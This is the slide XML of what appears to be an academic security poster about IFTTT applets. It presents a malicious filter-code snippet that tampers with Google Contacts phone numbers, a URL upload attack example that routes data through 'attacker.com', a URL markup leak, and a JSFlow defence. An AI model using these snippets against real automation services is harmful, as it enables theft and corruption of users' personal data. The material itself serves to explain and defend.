              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Applets can be triggered by untrusted sources. Consider a case where a malicious filter code for the applet "Google Contacts saved to Google Drive Spreadsheet" is used to back up the list of contact numbers into a Google Spreadsheet. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>var name = GoogleContacts.newContactAdded.Name;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>var num = GoogleContacts.newContactAdded.PhoneNumber;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>var digit = Math.floor ( Math . random () *10) +‘’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>var num1 = num.replace (num . charAt (5) , digit );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>GoogleSheets.appendToGoogleSpreadsheet.setFormattedRow ( name +'||| '+ num1 );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Abadi Extra Light" panose="020B0204020104020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Urdu Typesetting" panose="020B0604020202020204" pitchFamily="66" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The above malicious code reads the name and phone number (lines 1-2) of a user’s Google contact and randomly modifies the sixth digit of the phone number (lines 3-4), before storing the name and the modified number to the spreadsheet. Here your information is modified.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Text Box 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{964DA339-A4BE-48A4-A338-BDA9817A541F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="16512988" y="2632814"/>
            <a:ext cx="7772400" cy="2693305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="thinThick">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="32262" tIns="16131" rIns="32262" bIns="16131">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>URL Upload Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" u="sng" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Under the URL upload attack, the attacker exploits the capability of uploads via links. In a scenario of a photo backup applet like above, IFTTT stores any new photo on its server and passes it to Google Drive using an intermediate URL. Thus, the attacker can pass the intermediate URL to its own server instead, either by string processing in the JavaScript code of the filter, as in 'https:// attacker.com?' + encodeURIComponent(originalURL), or by editing parameters of an ingredient in a similar fashion. For the attack to remain unnoticed, the attacker configures attacker.com to forward the original image in the response to Google Drive, so that the image is backed up as expected by the user. This attack requires no additional user interaction since the link upload is unsuspiciously executed by Google Drive.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Text Box 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1C1B9CE-7500-402F-B635-2DC53490BE56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="16539882" y="9972557"/>
            <a:ext cx="7772400" cy="1991575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="thinThick">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="32262" tIns="16131" rIns="32262" bIns="16131">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>URL Markup Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" u="sng" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Under the URL markup attack, the attacker creates HTML markup with a link to an invisible image with the crafted URL embedding the secret. The markup can be part of a post on a social network or a body of an email message. The leak is then executed by a web request upon processing the markup by a web browser or an email reader. This attack requires waiting for a user to view the resulting markup, but it does not require the attacker’s server to do anything other than record request parameters.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Text Box 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38D87D4F-8B2A-4B2F-97E3-1FC415A304EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8337177" y="1584927"/>
            <a:ext cx="7745505" cy="1903859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="thinThick">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="32262" tIns="16131" rIns="32262" bIns="16131">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>These applets are reactive applications that include triggers, a piece of filter code and actions to dictate which actions should run based on trigger data coming in .This requires users to provide these applets access to various smart home applications including cameras , geo location etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>This creates an opportunity for malicious attackers via third party applications to infiltrate and exploit data causing personal information loss.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB7500F8-990E-4AC0-A4B0-B20AEA59D170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="215152" y="7732403"/>
            <a:ext cx="7906871" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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These applets are given  access to sensitive information by the users for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cross app interaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. They are triggered by changes that occur within other web services such as Gmail, Facebook, Telegram, Maps Instagram, or Pinterest and provide actions like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“Turn off all the devices when leaving home and Turn on AC automatically in the proximity of home”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="TextBox 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CE63F67-5177-4A86-947E-8BB90D90B32A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="24608117" y="12722587"/>
            <a:ext cx="7960659" cy="1261884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Information-flow analysis through JSflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> identifies sources of sensitive information, can limit what the service may do with information from those sources, e.g., ensuring that the information does not leave the browser, or is not sent to a third party. JSFlow, a security-enhanced JavaScript interpreter for fine-grained tracking of information flow is used to prevent such URL attack.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="104" name="Straight Arrow Connector 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03177EC9-C069-4996-B211-8AFAB3305AFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="26402771" y="9817316"/>
            <a:ext cx="15753" cy="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7084232-6868-4093-873C-240A8F869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09" y="180726"/>
            <a:ext cx="3781167" cy="894877"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7D52D45-6F7F-4D6B-8BE7-97A5EBF99417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3425190" y="12447041"/>
            <a:ext cx="4266528" cy="3474271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0CAF65A-1266-40CA-BD85-E961AEF9F795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="215153" y="9074216"/>
            <a:ext cx="293145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IFTTT: App Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="TextBox 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26E3B294-7D98-42A9-99AA-991888FD14EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="388456" y="10710858"/>
            <a:ext cx="1355321" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>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if</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="TextBox 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A34ED2D6-85C2-4801-ACED-5D585B229AA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1910518" y="10742454"/>
            <a:ext cx="1899903" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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then</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Picture 62" descr="A close up of a sign&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C3C87ED-F59A-4576-AF82-B73B0C084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3842" y="10461808"/>
            <a:ext cx="834407" cy="834407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9801197D-CEA9-4E60-8417-C932D9964F31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="215154" y="15275862"/>
            <a:ext cx="1425387" cy="477054"/>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trigger</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="TextBox 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEF3AF1F-3220-4728-A376-4D53C2B342C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1873625" y="15643412"/>
            <a:ext cx="1407459" cy="477054"/>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action</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Oval 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D020B8B-3006-4202-BA13-B179291B8923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3550024" y="14280771"/>
            <a:ext cx="1129553" cy="2958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2A62D1AE-9CCD-460D-A721-1A48A8DAD927}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="77" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4652682" y="12296816"/>
            <a:ext cx="1532965" cy="2252902"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="0C234B"/>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E56C6C26-A3C2-430F-8BC8-6DBFF645B9F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4867835" y="11819762"/>
            <a:ext cx="2635624" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Party app</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2219005C-BA38-4D2E-9BBC-703DD32C5B0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="268940" y="9574306"/>
            <a:ext cx="5836025"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t>With no Filter code info added/updated at any time </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Straight Arrow Connector 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A5F075-8134-4DAE-9239-CF2F215C7F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860613" y="13581529"/>
